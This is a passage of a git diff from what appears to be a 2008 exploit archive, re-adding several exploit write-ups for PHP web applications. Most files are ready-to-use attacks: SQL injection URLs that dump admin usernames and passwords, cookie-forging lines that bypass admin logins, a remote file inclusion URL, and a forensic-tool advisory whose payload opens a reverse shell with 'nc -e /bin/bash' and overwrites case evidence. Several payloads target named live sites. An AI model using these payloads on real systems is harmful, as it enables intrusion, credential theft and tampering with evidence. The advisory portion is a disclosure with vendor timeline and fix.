-[+] http://preproject.com/prebay/buyer_detail.php?prodid=350&custid=240&sid=111&cid=-26+UNION+ALL+SELECT+1,concat(login,0x3a,password),3,4+FROM+admin--
-
-
-===[ Greetz ]===
-[~] ALLAH
-[~] Tornado2800 
-[~] Hussain-X 
-
-//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-//ALLAH,forgimme...
-
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-exit(); //EoX
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-# milw0rm.com [2008-11-05]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+                              IN THE NAME OF ALLAH
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+Pre Multi-Vendor Shopping Malls Multiple Vulnerabilities
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+[~] Script:         	Pre Multi-Vendor Shopping Malls | Preproject MCart | PRE MULTI-VENDOR E-COMMERCE SOLUTION
+[~] Language :         	PHP
+[~] Website[main]:     	http://www.preproject.com
+[~] Website[script]:    http://www.preproject.com/mcart.asp
+[~] Type :             	Commercial
+[~] Report-Date :     	05/11/2008
+[~] Founder :			G4N0K 
+
+===============================================================================
+
+===[ Insecure Cookie Handling ]===
+admin-panel: http://localhost/[path]/SiteAdmin/
+[0] javascript:document.cookie = "adminname=admin";
+[1] javascript:document.cookie = "adminid=admin";
+
+===[ LIVE ]===
+admin-panel: http://preproject.com/prebay/siteadmin/
+[0] javascript:document.cookie = "adminname=admin";
+[1] javascript:document.cookie = "adminid=admin";
+
+
+
+===[ SQL ]===
+[!] http://localhost/[path]/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(user(),0x3a,version()),4,5--&cid=26
+[!] http://localhost/[path]/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(login,0x3a,password),4,5+FROM+admin--&cid=26
+[!] http://localhost/[path]/buyer_detail.php?prodid=350&custid=240&sid=111&cid=-26+UNION+ALL+SELECT+1,concat(login,0x3a,password),3,4+FROM+admin--
+
+
+
+===[ SQL-LIVE ]===
+[+] http://preproject.com/prebay/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(user(),0x3a,version()),4,5--&cid=26
+[+] http://preproject.com/prebay/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(login,0x3a,password),4,5+FROM+admin--&cid=26
+[+] http://preproject.com/prebay/buyer_detail.php?prodid=350&custid=240&sid=111&cid=-26+UNION+ALL+SELECT+1,concat(login,0x3a,password),3,4+FROM+admin--
+
+
+===[ Greetz ]===
+[~] ALLAH
+[~] Tornado2800 
+[~] Hussain-X 
+
+//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+//ALLAH,forgimme...
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+exit(); //EoX
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/7000.txt b/platforms/php/webapps/7000.txt
index 22a190069..036cda184 100755
--- a/platforms/php/webapps/7000.txt
+++ b/platforms/php/webapps/7000.txt
@@ -1,46 +1,46 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-                              IN THE NAME OF ALLAH
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-Pre Classified Listings PHP Insecure Cookie Handling
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-[~] Script:         	Pre Classified Listings PHP version
-[~] Language :         	PHP
-[~] Website[main]:     	http://www.preproject.com
-[~] Website[script]:    http://www.preproject.com/pclphp.asp
-[~] Type :             	Commercial
-[~] Report-Date :     	05/11/2008
-[~] Founder :			G4N0K 
-
-===============================================================================
-
-===[ Insecure Cookie Handling ]===
-Admin Panel: http://localhost/[path]/admin/
-[0] javascript:document.cookie = "adminname=admin";
-[1] javascript:document.cookie = "adminid=admin";
-
-
-
-===[ LIVE ]===
-Admin Panel: http://www.hostnomi.net/classi/admin/
-[0] javascript:document.cookie = "adminname=admin";
-[1] javascript:document.cookie = "adminid=admin";
-
-
-
-
-
-===[ Greetz ]===
-[~] ALLAH
-[~] Tornado2800 
-[~] Hussain-X 
-
-//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-//ALLAH,forgimme...
-
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-exit(); //EoX
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-# milw0rm.com [2008-11-05]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+                              IN THE NAME OF ALLAH
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+Pre Classified Listings PHP Insecure Cookie Handling
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+[~] Script:         	Pre Classified Listings PHP version
+[~] Language :         	PHP
+[~] Website[main]:     	http://www.preproject.com
+[~] Website[script]:    http://www.preproject.com/pclphp.asp
+[~] Type :             	Commercial
+[~] Report-Date :     	05/11/2008
+[~] Founder :			G4N0K 
+
+===============================================================================
+
+===[ Insecure Cookie Handling ]===
+Admin Panel: http://localhost/[path]/admin/
+[0] javascript:document.cookie = "adminname=admin";
+[1] javascript:document.cookie = "adminid=admin";
+
+
+
+===[ LIVE ]===
+Admin Panel: http://www.hostnomi.net/classi/admin/
+[0] javascript:document.cookie = "adminname=admin";
+[1] javascript:document.cookie = "adminid=admin";
+
+
+
+
+
+===[ Greetz ]===
+[~] ALLAH
+[~] Tornado2800 
+[~] Hussain-X 
+
+//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+//ALLAH,forgimme...
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+exit(); //EoX
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/7001.txt b/platforms/php/webapps/7001.txt
index 72072f18d..33b163bf4 100755
--- a/platforms/php/webapps/7001.txt
+++ b/platforms/php/webapps/7001.txt
@@ -1,240 +1,240 @@
-==================================================== 
-Security Research Advisory
-
-Vulnerability name: DFLabs PTK Local Command Execution Vulnerability
-Advisory number: LC-2008-07
-Advisory URL: http://www.ikkisoft.com
-
-==================================================== 
-1) Affected Software 
-
-* DFLabs PTK 1.0 (final release)
-
-Previous versions are affected as well:
-
-* DFLabs PTK 0.2
-* DFLabs PTK 0.1
-
-====================================================
-2) Severity 
-
-Severity: High
-Local/Remote: Local
-
-Note: remote command execution is possible and moreover 
-easy to trigger; however, due to the nature of the tool, only 
-the local command execution poses a serious real world threat
-
-==================================================== 
-3) Summary
-
-As reported in the project website, "PTK is an alternative advanced interface 
-for the suite TSK (The Sleuth Kit). [...] PTK is not just a new graphic and 
-highly professional interface based on Ajax technology but offers a great deal 
-of features like analysis, search and management of complex cases of digital 
-investigation". PTK is included within the SANS Investigative Forensic Toolkit 
-(SIFT) Workstation.
-
-This application is vulnerable to multiple input validation attacks. The 
-possibility to exploit these findings introduces several malicious scenarios. 
-For instance, a criminal may abuse this specific vulnerability to modify 
-the evidence of the crime, compromising the digital investigation workstation. 
-Even if the original evidence should be accessed only in read-only mode, 
-using also hardware write blockers according to forensic best practices, 
-several malicious scenarios are possible with just the alteration of the 
-working copy image. Additionally, a payload could be crafted to hide, 
-or alter, just the information presented to the analyst, something which 
-would not be evident unless the same image is analyzed with a tool not 
-vulnerable to the attack.
-
-In our research, we have developed a reliable Proof-of-Concept in order 
-to exploit an arbitrary local command execution vulnerability showing possible 
-anti forensic attacks. As defined by Rogers D. M. (2005), anti forensics 
-attempts to "negatively affect the existence, amount and/or quality of 
-evidence from a crime scene, or make the analysis and examination of evidence 
-difficult or impossible to conduct".
-
-References:
-http://ptk.dflabs.com/
-http://en.wikipedia.org/wiki/Counter_forensics
-
-====================================================
-4) Vulnerability Details
-
-The PTK interface is prone to multiple input validation vulnerabilities that may 
-result in a silent local command execution.
-
-Since the application fails to validate most of the input vectors, Cross Site 
-Scripting, CSRF and other flaws are possible. However, due to the nature of the 
-tool, our research aimed to point out the possible risks and attack techniques 
-which could be used in order to silently compromise the investigation platform 
-and corrupt evidence without user interaction.
-Even if the application is vulnerable to remote command execution, as a real life 
-threat it is pretty unrealistic. PTK, as well as Autopsy, are usually used in the 
-"localhost" context where a single user (the investigator) analyzes the crime image.
-
-However, in our humble opinion, a local command execution vulnerability triggered 
-by the simple inclusion of the acquired crime scene image should be considered 
-as an HIGH impact flaw with an HIGH exploitability rate.
-
-Once the investigator has loaded the binary image (e.g. a "dd" file), he can 
-browse the filesystem tree and look for a specific file. During the browsing, 
-the Ajax-based application uses binaries of the Sleuth Kit in order to access 
-the acquired image content. In the browsing, the "fls" application is involved. 
-As illustrated in the man, it lists the files and directory names in the image 
-and can display file names of recently deleted files for the directory using the 
-given inode.
-
-Once the investigator selects a specific file from the image filesystem, PTK 
-invokes the following script:
-
-/ptk/lib/file_content.php?arg1=null&arg2=107533&arg3=&arg4=1  
-
-where  is the filename without any kind of input validation retrieved 
-from the image via fls. 
-A malicious user (e.g. a person under investigation) may abuse this attack input
-simply creating a crafted file in his/her filesystem, as demonstrated below.
-
-Due to the possibility to pollute the "arg3" variable, we can also override the 
-"arg1" HTTP parameter with the following content:
-
-arg3 --> Confidential.doc&arg1=[new arg1 variable value]
-
-This request is managed by PTK using the following code:
-
-[..]
-$offset = $_GET['arg1'];
-$inode = $_GET['arg2'];
-$name = $_GET['arg3'];
-$partition_id = $_GET['arg4'];
-$page_offset = 100;
-[..]
-$type = get_file_type($_SESSION['image_path'], $offset, $inode);
-[..]
-
-where the function "get_file_type" is:
-
-function get_file_type($path, $offset, $inode){
-	include("../config/conf.php");
-	if($offset == 'null'){
-		$offset = '';
-	}else{
-		$offset = "-o $offset";
-	}
-	if($inode == 'null') $inode = '';
-	$result = shell_exec("$icat_bin -r $offset $path $inode | $file_bin -zb -");
-	if(preg_match("/(image data)|(PC bitmap data)/", $result)){
-		$_SESSION['is_graphic'] = 1;
-	}
-	return $result;
-}
-
-As you can see, the $offset variable used within the unfiltered shell_exec 
-function could be used in order to execute arbitrary system commands 
-with the privileges of the web server. 
-
-Since the malicious payload should be included in the filename, some obfuscation 
-techniques are pretty interesting in order to force PTK to not reveal the real filename.
-Several possibilities were tested, including the usage of UTF-7 encoding since PTK 
-does not force a specific page charset. However the most reliable and easy to use 
-technique is the inclusion of fake HTML tags:
-
-Confidential.doc
-
-It should be noted that the simple injection of HTML tag chars ("<", "&", ">", ..) 
-is not possible due to HTML filtering which results in the corresponding HTML entities.
-
-Lastly, we want to inform the PTK team that other functions are probably vulnerable 
-to similar attacks.  Several instances of the "shell_exec" PHP function are present 
-in the "/lib" files and they are used with unfiltered parameters:
-
-/lib/check_image_integrity.php 
-/lib/folder_browsing.php
-/lib/lib_command.php
-/lib/new_image.php
-
-$ grep -R "shell_exec(" ./lib/ | wc -l
-73
-
-Since PTK needs to execute system commands in order to invoke the Sleuth Kit 
-binaries, no standard mitigations are applicable (e.g. disable_functions, 
-safe_mode and others). 
-
-==================================================== 
-5) Exploit 
-
-The attacker can use this crafted filename in order to silently trigger the 
-arbitrary command execution and open a remote shell: 
-
-Confidential.doc
-
-From the application point of view, it results in the following commands:
-
-"/usr/local/bin/icat -r -o a;nc -e /bin/bash 192.168.1.3 12345;> /var/www/ptk/
-images/myCase_myCrime.001 1936 | /usr/bin/file -zb -"
-
-In addition to the remote shell, this payload compromises the crime evidence
-because the char ">" acts as an output redirection in the shell, resulting in 
-the acquired image overriding. If the image was added using the option "symlink", 
-the working-copy crime image is fatally compromised. Obviously, according to the 
-forensic best practices, the original image should be accessed in read-only mode 
-and carefully stored.
-
-A demonstration video of the attack is provided as well. 
-- http://www.vimeo.com/2161045 (High quality streaming)
-- http://uk.youtube.com/watch?v=KXXALJUrdYM&fmt=18 (Low quality streaming)
-- http://www.ikkisoft.com/stuff/ptk_exploit_poc.avi
-
-
-According to the PTK Practice Cases (http://ptk.dflabs.com/tutorial.html), 
-a standard Linux Ubuntu with Apache, MySQL and PHP5 was used during our test.
-
-==================================================== 
-6) Fix Information 
-
-A software update is required in order to resolve this issue. 
-The PTK team has released a new version (ptk-1.0.1.tar.gz, 04/11/2008), 
-available on the project website.
-
-Upgrade your PTK as soon as possible!
-
-The new version deploys OWASP PHP filters to avoid unexpected input used 
-within Sleuth Kit binaries.
-
-In order to clarify their position about security bug reports, the team has 
-published the following comment: http://ptk.dflabs.com/faq.html 
-
-==================================================== 
-7) Time Table 
-
-30/10/2008 - Vendor notified.
-30/10/2008 - Vendor response.
-04/11/2008 - Vendor patch release.
-05/11/2008 - Public disclosure.
-
-==================================================== 
-8) Credits 
-
-Discovered by Luca "ikki" Carettoni - luca.carettoni[at]ikkisoft[dot]com
-
-==================================================== 
-9) Legal Notices
-
-The information in the advisory is believed to be accurate at the time of
-publishing based on currently available information. 
-This information is provided as-is, as a free service to the community. 
-There are no warranties with regard to this information.
-The author does not accept any liability for any direct, indirect,
-or consequential loss or damage arising from use of, or reliance on, this information.
-Permission is hereby granted for the redistribution of this alert, provided 
-that the content is not altered in any way, except reformatting, and that due 
-credit is given.
-
-This vulnerability has been disclosed in accordance with 
-the RFP Full-Disclosure Policy v2.0, available at:
-http://www.wiretrip.net/rfp/policy.html
-
-====================================================
-
-# milw0rm.com [2008-11-05]
+==================================================== 
+Security Research Advisory
+
+Vulnerability name: DFLabs PTK Local Command Execution Vulnerability
+Advisory number: LC-2008-07
+Advisory URL: http://www.ikkisoft.com
+
+==================================================== 
+1) Affected Software 
+
+* DFLabs PTK 1.0 (final release)
+
+Previous versions are affected as well:
+
+* DFLabs PTK 0.2
+* DFLabs PTK 0.1
+
+====================================================
+2) Severity 
+
+Severity: High
+Local/Remote: Local
+
+Note: remote command execution is possible and moreover 
+easy to trigger; however, due to the nature of the tool, only 
+the local command execution poses a serious real world threat
+
+==================================================== 
+3) Summary
+
+As reported in the project website, "PTK is an alternative advanced interface 
+for the suite TSK (The Sleuth Kit). [...] PTK is not just a new graphic and 
+highly professional interface based on Ajax technology but offers a great deal 
+of features like analysis, search and management of complex cases of digital 
+investigation". PTK is included within the SANS Investigative Forensic Toolkit 
+(SIFT) Workstation.
+
+This application is vulnerable to multiple input validation attacks. The 
+possibility to exploit these findings introduces several malicious scenarios. 
+For instance, a criminal may abuse this specific vulnerability to modify 
+the evidence of the crime, compromising the digital investigation workstation. 
+Even if the original evidence should be accessed only in read-only mode, 
+using also hardware write blockers according to forensic best practices, 
+several malicious scenarios are possible with just the alteration of the 
+working copy image. Additionally, a payload could be crafted to hide, 
+or alter, just the information presented to the analyst, something which 
+would not be evident unless the same image is analyzed with a tool not 
+vulnerable to the attack.
+
+In our research, we have developed a reliable Proof-of-Concept in order 
+to exploit an arbitrary local command execution vulnerability showing possible 
+anti forensic attacks. As defined by Rogers D. M. (2005), anti forensics 
+attempts to "negatively affect the existence, amount and/or quality of 
+evidence from a crime scene, or make the analysis and examination of evidence 
+difficult or impossible to conduct".
+
+References:
+http://ptk.dflabs.com/
+http://en.wikipedia.org/wiki/Counter_forensics
+
+====================================================
+4) Vulnerability Details
+
+The PTK interface is prone to multiple input validation vulnerabilities that may 
+result in a silent local command execution.
+
+Since the application fails to validate most of the input vectors, Cross Site 
+Scripting, CSRF and other flaws are possible. However, due to the nature of the 
+tool, our research aimed to point out the possible risks and attack techniques 
+which could be used in order to silently compromise the investigation platform 
+and corrupt evidence without user interaction.
+Even if the application is vulnerable to remote command execution, as a real life 
+threat it is pretty unrealistic. PTK, as well as Autopsy, are usually used in the 
+"localhost" context where a single user (the investigator) analyzes the crime image.
+
+However, in our humble opinion, a local command execution vulnerability triggered 
+by the simple inclusion of the acquired crime scene image should be considered 
+as an HIGH impact flaw with an HIGH exploitability rate.
+
+Once the investigator has loaded the binary image (e.g. a "dd" file), he can 
+browse the filesystem tree and look for a specific file. During the browsing, 
+the Ajax-based application uses binaries of the Sleuth Kit in order to access 
+the acquired image content. In the browsing, the "fls" application is involved. 
+As illustrated in the man, it lists the files and directory names in the image 
+and can display file names of recently deleted files for the directory using the 
+given inode.
+
+Once the investigator selects a specific file from the image filesystem, PTK 
+invokes the following script:
+
+/ptk/lib/file_content.php?arg1=null&arg2=107533&arg3=&arg4=1  
+
+where  is the filename without any kind of input validation retrieved 
+from the image via fls. 
+A malicious user (e.g. a person under investigation) may abuse this attack input
+simply creating a crafted file in his/her filesystem, as demonstrated below.
+
+Due to the possibility to pollute the "arg3" variable, we can also override the 
+"arg1" HTTP parameter with the following content:
+
+arg3 --> Confidential.doc&arg1=[new arg1 variable value]
+
+This request is managed by PTK using the following code:
+
+[..]
+$offset = $_GET['arg1'];
+$inode = $_GET['arg2'];
+$name = $_GET['arg3'];
+$partition_id = $_GET['arg4'];
+$page_offset = 100;
+[..]
+$type = get_file_type($_SESSION['image_path'], $offset, $inode);
+[..]
+
+where the function "get_file_type" is:
+
+function get_file_type($path, $offset, $inode){
+	include("../config/conf.php");
+	if($offset == 'null'){
+		$offset = '';
+	}else{
+		$offset = "-o $offset";
+	}
+	if($inode == 'null') $inode = '';
+	$result = shell_exec("$icat_bin -r $offset $path $inode | $file_bin -zb -");
+	if(preg_match("/(image data)|(PC bitmap data)/", $result)){
+		$_SESSION['is_graphic'] = 1;
+	}
+	return $result;
+}
+
+As you can see, the $offset variable used within the unfiltered shell_exec 
+function could be used in order to execute arbitrary system commands 
+with the privileges of the web server. 
+
+Since the malicious payload should be included in the filename, some obfuscation 
+techniques are pretty interesting in order to force PTK to not reveal the real filename.
+Several possibilities were tested, including the usage of UTF-7 encoding since PTK 
+does not force a specific page charset. However the most reliable and easy to use 
+technique is the inclusion of fake HTML tags:
+
+Confidential.doc
+
+It should be noted that the simple injection of HTML tag chars ("<", "&", ">", ..) 
+is not possible due to HTML filtering which results in the corresponding HTML entities.
+
+Lastly, we want to inform the PTK team that other functions are probably vulnerable 
+to similar attacks.  Several instances of the "shell_exec" PHP function are present 
+in the "/lib" files and they are used with unfiltered parameters:
+
+/lib/check_image_integrity.php 
+/lib/folder_browsing.php
+/lib/lib_command.php
+/lib/new_image.php
+
+$ grep -R "shell_exec(" ./lib/ | wc -l
+73
+
+Since PTK needs to execute system commands in order to invoke the Sleuth Kit 
+binaries, no standard mitigations are applicable (e.g. disable_functions, 
+safe_mode and others). 
+
+==================================================== 
+5) Exploit 
+
+The attacker can use this crafted filename in order to silently trigger the 
+arbitrary command execution and open a remote shell: 
+
+Confidential.doc
+
+From the application point of view, it results in the following commands:
+
+"/usr/local/bin/icat -r -o a;nc -e /bin/bash 192.168.1.3 12345;> /var/www/ptk/
+images/myCase_myCrime.001 1936 | /usr/bin/file -zb -"
+
+In addition to the remote shell, this payload compromises the crime evidence
+because the char ">" acts as an output redirection in the shell, resulting in 
+the acquired image overriding. If the image was added using the option "symlink", 
+the working-copy crime image is fatally compromised. Obviously, according to the 
+forensic best practices, the original image should be accessed in read-only mode 
+and carefully stored.
+
+A demonstration video of the attack is provided as well. 
+- http://www.vimeo.com/2161045 (High quality streaming)
+- http://uk.youtube.com/watch?v=KXXALJUrdYM&fmt=18 (Low quality streaming)
+- http://www.ikkisoft.com/stuff/ptk_exploit_poc.avi
+
+
+According to the PTK Practice Cases (http://ptk.dflabs.com/tutorial.html), 
+a standard Linux Ubuntu with Apache, MySQL and PHP5 was used during our test.
+
+==================================================== 
+6) Fix Information 
+
+A software update is required in order to resolve this issue. 
+The PTK team has released a new version (ptk-1.0.1.tar.gz, 04/11/2008), 
+available on the project website.
+
+Upgrade your PTK as soon as possible!
+
+The new version deploys OWASP PHP filters to avoid unexpected input used 
+within Sleuth Kit binaries.
+
+In order to clarify their position about security bug reports, the team has 
+published the following comment: http://ptk.dflabs.com/faq.html 
+
+==================================================== 
+7) Time Table 
+
+30/10/2008 - Vendor notified.
+30/10/2008 - Vendor response.
+04/11/2008 - Vendor patch release.
+05/11/2008 - Public disclosure.
+
+==================================================== 
+8) Credits 
+
+Discovered by Luca "ikki" Carettoni - luca.carettoni[at]ikkisoft[dot]com
+
+==================================================== 
+9) Legal Notices
+
+The information in the advisory is believed to be accurate at the time of
+publishing based on currently available information. 
+This information is provided as-is, as a free service to the community. 
+There are no warranties with regard to this information.
+The author does not accept any liability for any direct, indirect,
+or consequential loss or damage arising from use of, or reliance on, this information.
+Permission is hereby granted for the redistribution of this alert, provided 
+that the content is not altered in any way, except reformatting, and that due 
+credit is given.
+
+This vulnerability has been disclosed in accordance with 
+the RFP Full-Disclosure Policy v2.0, available at:
+http://www.wiretrip.net/rfp/policy.html
+
+====================================================
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/7002.txt b/platforms/php/webapps/7002.txt
index 9918afd60..d97b4a959 100755
--- a/platforms/php/webapps/7002.txt
+++ b/platforms/php/webapps/7002.txt
@@ -1,43 +1,43 @@
-======================================================================================================================================
-
-
-  [o] Dada Mail Manager Component 2.6 Remote File Inclusion Vulnerability
-
-       Software : com_dadamail version 2.6
-       Vendor   : http://joomlander.net
-       Download : http://joomlacode.org/gf/project/dadamailmanager/frs
-       Author   : NoGe
-       Contact  : noge[dot]code[at]gmail[dot]com
-       Blog     : http://evilc0de.blogspot.com
-
-
-======================================================================================================================================
-
-
-  [o] Vulnerable file
-
-       administrator/components/com_dadamail/config.dadamail.php
-
-        require_once($GLOBALS['mosConfig_absolute_path'] . '/administrator/components/com_dadamail/language/default.php');
-
-
-
-  [o] Exploit
-
-       http://localhost/[path]/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
-
-
-======================================================================================================================================
-
-
-  [o] Greetz
-
-       MainHack BrotherHood [ http://serverisdown.org/blog/]
-       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
-       H312Y yooogy mousekill }^-^{ kaka11  martfella
-       skulmatic olibekas ulga Cungkee k1tk4t str0ke
-
-        
-======================================================================================================================================
-
-# milw0rm.com [2008-11-05]
+======================================================================================================================================
+
+
+  [o] Dada Mail Manager Component 2.6 Remote File Inclusion Vulnerability
+
+       Software : com_dadamail version 2.6
+       Vendor   : http://joomlander.net
+       Download : http://joomlacode.org/gf/project/dadamailmanager/frs
+       Author   : NoGe
+       Contact  : noge[dot]code[at]gmail[dot]com
+       Blog     : http://evilc0de.blogspot.com
+
+
+======================================================================================================================================
+
+
+  [o] Vulnerable file
+
+       administrator/components/com_dadamail/config.dadamail.php
+
+        require_once($GLOBALS['mosConfig_absolute_path'] . '/administrator/components/com_dadamail/language/default.php');
+
+
+
+  [o] Exploit
+
+       http://localhost/[path]/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
+
+
+======================================================================================================================================
+
+
+  [o] Greetz
+
+       MainHack BrotherHood [ http://serverisdown.org/blog/]
+       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
+       H312Y yooogy mousekill }^-^{ kaka11  martfella
+       skulmatic olibekas ulga Cungkee k1tk4t str0ke
+
+        
+======================================================================================================================================
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/7003.txt b/platforms/php/webapps/7003.txt
index 7437232bc..487c79956 100755
--- a/platforms/php/webapps/7003.txt
+++ b/platforms/php/webapps/7003.txt
@@ -1,41 +1,41 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-                              IN THE NAME OF ALLAH
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-PHP Auto Listings (moreinfo.php pg) SQL Injection Vulnerability
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-[~] Script:         	PHP Auto Listings Script
-[~] Language :         	PHP
-[~] Website[0]:     	http://preproject.com/projectDetail.asp?projectID=226
-[~] Website[1]:			http://www.hotscripts.com/Detailed/71197.html
-[~] Type :             	Commercial
-[~] Report-Date :     	06/11/2008
-[~] Founder :			G4N0K 
-
-===============================================================================
-
-===[ SQL ]===
-[!]	http://localhost/[path]/moreinfo.php?pg=4&itemno=122-20'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,+concat(0x3a,user,0x3a,pass)+FROM+admin--+AND+'GNK'='GNK&catid=11
-
-
-===[ LIVE ]===
-[+] http://www.preproject.com/abc/carlister/moreinfo.php?pg=4&itemno=122-20'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,+concat(0x3a,user,0x3a,pass)+FROM+admin--+AND+'GNK'='GNK&catid=11
-
-
-
-
-
-===[ Greetz ]===
-[~] ALLAH
-[~] Tornado2800 
-[~] Hussain-X 
-
-//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-//ALLAH,forgimme...
-
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-exit(); //EoX
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-# milw0rm.com [2008-11-05]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+                              IN THE NAME OF ALLAH
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+PHP Auto Listings (moreinfo.php pg) SQL Injection Vulnerability
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+[~] Script:         	PHP Auto Listings Script
+[~] Language :         	PHP
+[~] Website[0]:     	http://preproject.com/projectDetail.asp?projectID=226
+[~] Website[1]:			http://www.hotscripts.com/Detailed/71197.html
+[~] Type :             	Commercial
+[~] Report-Date :     	06/11/2008
+[~] Founder :			G4N0K 
+
+===============================================================================
+
+===[ SQL ]===
+[!]	http://localhost/[path]/moreinfo.php?pg=4&itemno=122-20'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,+concat(0x3a,user,0x3a,pass)+FROM+admin--+AND+'GNK'='GNK&catid=11
+
+
+===[ LIVE ]===
+[+] http://www.preproject.com/abc/carlister/moreinfo.php?pg=4&itemno=122-20'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,+concat(0x3a,user,0x3a,pass)+FROM+admin--+AND+'GNK'='GNK&catid=11
+
+
+
+
+
+===[ Greetz ]===
+[~] ALLAH
+[~] Tornado2800 
+[~] Hussain-X 
+
